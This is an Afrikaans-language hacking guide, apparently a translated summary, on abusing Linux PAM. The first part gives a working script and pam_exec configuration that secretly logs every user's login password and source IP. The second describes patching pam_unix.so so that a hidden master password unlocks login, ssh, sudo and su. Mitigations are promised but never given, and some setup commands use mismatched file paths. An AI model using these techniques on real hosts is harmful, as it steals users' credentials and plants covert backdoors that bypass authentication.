Sniffing Aanteken Wagwoorde met PAM

Laat ons 'n PAM-module konfigureer om elke wagwoord wat elke gebruiker gebruik om in te teken, te registreer. As jy nie weet wat PAM is nie, kyk na:

Vir verdere besonderhede, kyk na die oorspronklike pos. Hierdie is net 'n opsomming:

Tegniek-oorsig: Pluggable Authentication Modules (PAM) bied buigsaamheid in die bestuur van outentisering op Unix-gebaseerde stelsels. Hulle kan sekuriteit verbeter deur die aanpassing van intekenprosesse, maar hulle kan ook risiko's inhou as dit verkeerd gebruik word. Hierdie opsomming gee 'n tegniek om intekenbewyse vas te vang deur PAM te gebruik, tesame met mitigasie-strategieë.

Vaslegging van Bewyse:

• 'n Bash-skripsie met die naam toomanysecrets.sh word geskep om intekenpogings te registreer, deur die datum, gebruikersnaam ($PAM_USER), wagwoord (via stdin) en afgeleë gasheer-IP ($PAM_RHOST) na /var/log/toomanysecrets.log te vas te lê.

• Die skripsie word uitvoerbaar gemaak en geïntegreer in die PAM-konfigurasie (common-auth) deur die pam_exec.so-module te gebruik met opsies om stil te loop en die outentiserings-token aan die skripsie bloot te stel.

• Die benadering demonstreer hoe 'n gekompromitteerde Linux-gasheer uitgebuit kan word om bewyse heimlik te registreer.

#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh

Backdooring PAM

Vir verdere besonderhede, kyk na die oorspronklike pos. Hierdie is net 'n opsomming:

Die Pluggable Authentication Module (PAM) is 'n stelsel wat onder Linux gebruik word vir gebruikersverifikasie. Dit werk op drie hoofkonsepte: gebruikersnaam, wagwoord, en diens. Konfigurasie lêers vir elke diens is geleë in die /etc/pam.d/ gids, waar gedeelde biblioteke verifikasie hanteer.

Doel: Wysig PAM om verifikasie met 'n spesifieke wagwoord toe te laat, terwyl die werklike gebruikerswagwoord omseil word. Dit is veral gefokus op die pam_unix.so gedeelde biblioteek wat deur die common-auth lêer gebruik word, wat deur byna alle dienste vir wagwoordverifikasie ingesluit word.

Stappe om pam_unix.so te wysig:

1. Vind die Verifikasie Direktief in die common-auth lêer:

• Die lyn wat verantwoordelik is vir die kontrole van 'n gebruiker se wagwoord roep pam_unix.so aan.

2. Wysig Bronkode:

• Voeg 'n voorwaardelike verklaring by in die pam_unix_auth.c bronlêer wat toegang verleen as 'n voorafbepaalde wagwoord gebruik word, anders gaan dit voort met die normale verifikasieproses.

3. Herstel en Vervang die gewysigde pam_unix.so biblioteek in die toepaslike gids.

4. Toetsing:

• Toegang word verleen oor verskeie dienste (aanmelding, ssh, sudo, su, skermbeveiliging) met die voorafbepaalde wagwoord, terwyl normale verifikasieprosesse onveranderd bly.